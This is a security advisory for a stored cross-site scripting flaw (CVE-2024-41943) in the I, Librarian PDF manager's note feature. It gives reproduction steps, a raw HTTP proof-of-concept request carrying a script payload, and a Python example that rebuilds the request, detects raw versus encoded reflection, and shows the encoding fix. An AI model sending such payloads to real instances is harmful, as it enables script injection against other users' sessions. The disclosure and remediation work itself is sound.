CVE-2024-41943

I, Librarian (Free) - Stored XSS

I, Librarian is the open-source edition of a PDF management SaaS. Notes attached to a PDF are rendered on the Item Summary page without validation or output encoding.

An attacker who can save notes on a PDF can store a payload containing HTML or JavaScript in the note; the script then executes in the browser of every user who loads that item's summary page. Saving a note requires a valid session cookie and CSRF token, as the request below shows. The vulnerability was fixed in version 5.11.1.


Steps to Reproduce

  1. Import a PDF file and open its summary by clicking the imported file's name in the Items menu of the dashboard

  2. Click the "Pdf" button under the file's name at the top of the page to open the file's preview

  3. Click the "Annotations" button in the top menu and save a note containing an XSS payload such as: <script>alert(1)</script>

  4. The stored payload executes every time a user visits the targeted PDF's summary page.


Proof of Concept

POST /librarian/index.php/pdf/savenote HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Client-Width: 1280
X-Requested-With: XMLHttpRequest
Content-Length: 138
Origin: http://127.0.0.1:8080
Connection: keep-alive
Referer: http://127.0.0.1:8080/librarian/index.php/item
Cookie: IL=<cookie>
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0

note=%3Cscript%3Ealert(1)%3C%2Fscript%3E&pg=1&top=1&left=1&id=<pdf-id>&csrfToken=<token>
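The following is an added example, not code from the original advisory or from the I, Librarian code base. It rebuilds the form body of the proof-of-concept request with a Content-Length that matches the body, shows how to tell from a fetched Item Summary page whether a stored note comes back raw (vulnerable) or HTML-encoded (the fixed behaviour), and gives the output-encoding step that makes the payload inert. Nothing is sent over the network: two constructed page fragments stand in for a vulnerable and a patched instance. The endpoint path, the form parameter names and the IL cookie name are taken from the request above; the HTML fragments, the helper names and the `note-text` class are assumptions.

```python
"""Added example; not part of the original advisory or of I, Librarian.

The endpoint path, form field names and the IL cookie name come from the
proof-of-concept request in the advisory. The page fragments, helper names
and the 'note-text' class below are assumptions made for illustration.
"""
import html
from urllib.parse import urlencode

PAYLOAD = "<script>alert(1)</script>"
SAVE_NOTE_PATH = "/librarian/index.php/pdf/savenote"


def build_savenote_body(pdf_id: str, csrf_token: str, note: str = PAYLOAD) -> str:
    """URL-encode the form fields the way the browser's XHR does.

    safe="()" keeps the parentheses literal, so the output matches the body
    shown in the advisory: note=%3Cscript%3Ealert(1)%3C%2Fscript%3E&pg=1&...
    """
    fields = {"note": note, "pg": 1, "top": 1, "left": 1,
              "id": pdf_id, "csrfToken": csrf_token}
    return urlencode(fields, safe="()")


def build_savenote_request(host: str, pdf_id: str, csrf_token: str,
                           session_cookie: str, note: str = PAYLOAD) -> str:
    """Assemble the raw HTTP/1.1 request from the proof of concept.

    Only the headers the server relies on are kept, and Content-Length is
    computed from the body rather than typed by hand.
    """
    body = build_savenote_body(pdf_id, csrf_token, note)
    headers = [
        f"POST {SAVE_NOTE_PATH} HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With: XMLHttpRequest",
        f"Origin: http://{host}",
        f"Cookie: IL={session_cookie}",
        f"Content-Length: {len(body.encode())}",
    ]
    return "\r\n".join(headers) + "\r\n\r\n" + body


def classify_note_reflection(summary_html: str, note: str = PAYLOAD) -> str:
    """Decide how a stored note appears on a fetched Item Summary page.

    'raw'     - the payload is present verbatim and will execute (vulnerable)
    'encoded' - only the HTML-escaped form is present (fixed behaviour)
    'absent'  - the note does not appear on the page at all
    """
    if note in summary_html:
        return "raw"
    if html.escape(note) in summary_html:
        return "encoded"
    return "absent"


def render_note_safely(note: str) -> str:
    """The server-side fix: encode the note for an HTML text context before
    interpolating it into the page (PHP equivalent: htmlspecialchars with
    ENT_QUOTES). The wrapping div and its class are assumed markup."""
    return f'<div class="note-text">{html.escape(note, quote=True)}</div>'


# Constructed page fragments standing in for real server responses.
VULNERABLE_PAGE = f'<div class="note-text">{PAYLOAD}</div>'
PATCHED_PAGE = render_note_safely(PAYLOAD)

if __name__ == "__main__":
    print(build_savenote_request("127.0.0.1:8080", "42", "csrf-token", "session"))
    print(classify_note_reflection(VULNERABLE_PAGE))  # raw
    print(classify_note_reflection(PATCHED_PAGE))     # encoded
```

To check a live instance, save a harmless marker note through the same endpoint, fetch the item's summary page with the session cookie, and pass the response body to `classify_note_reflection` with that marker; a result of `raw` means the instance still interpolates notes without encoding.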
